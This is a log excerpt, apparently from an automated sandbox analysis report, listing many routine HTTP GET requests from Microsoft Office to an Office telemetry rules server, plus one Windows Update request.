    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DbN5n5YUtSNy7o2&MD=zyr2r5xC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
